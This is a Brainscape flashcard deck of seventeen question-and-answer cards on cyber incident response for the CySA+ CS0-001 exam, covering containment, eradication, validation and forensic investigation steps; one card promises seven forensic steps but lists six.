Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

CySA+ CS0-001 > 3.5 Cyber Incident Response > Flashcards

3.5 Cyber Incident Response Flashcards

1
Q

what is the best way to determine the attack vector used by a hacker?

A

reverse engineering

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

why should a first responder be familiar with the incident response plan?

A

to ensure that the appropriate procedures are followed

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

which eradication technique reinstalling the operating system, applying all system updates, reinstalling the anti-malware software, and implementing any organizational security settings?

A

reconstruction or re-imaging

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

what are the FOUR validation techniques?

A

patching, verifying permissions, scanning, verifying logging/communication to security monitoring

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

what is the name of the security process that involves recognition, verification, classification, containment, and analysis?

A

incident response

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

what are the THREE eradication techniques?

A

sanitization, reconstruction or re-image, secure disposal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

what are the FOUR containment techniques?

A

segmentation, isolation, removal, reverse engineering

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

which containment techniques involves limiting the scope of the incident by leveraging existing segments of the network as barriers to prevent the spread of the incident to other segments?

A

segmentation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

which containment technique involves retracing the steps in the incident as seen from the logs in the affected devices or in logs of infrastructure devices that may have been involved?

A

reverse engineering

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

what is the name of the group of people appointed to respond to security incidents?

A

incident response team

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

which type of review should be completed last as part of incident response?

A

a post-mortem review

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

which containment technique involves either by blocking all traffic to and from the device or devices or shutting down the device or devices’ interfaces?

A

isolation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

what are the SEVEN steps in a FORENSIC INVESTIGATION?

A
  1. identification
  2. preservation
  3. collection
  4. examination
  5. analysis
  6. presentation
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

which eradication technique removes all tracers of the threat by overwriting the drive multiple times to ensure all data is destroyed?

A

sanitization

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

in which location should all changes made to your organization’s network and computers be listed?

A

in the change management system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

what are the FIVE steps in the INCIDENT RESPONSE PROCESS?

A

contain, eradicate, validate, corrective action, reporting

17
Q

what is incident management?

A

the activities of an organization to identify, analyze, and correct risks as they are identified

CySA+ CS0-001 (26 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions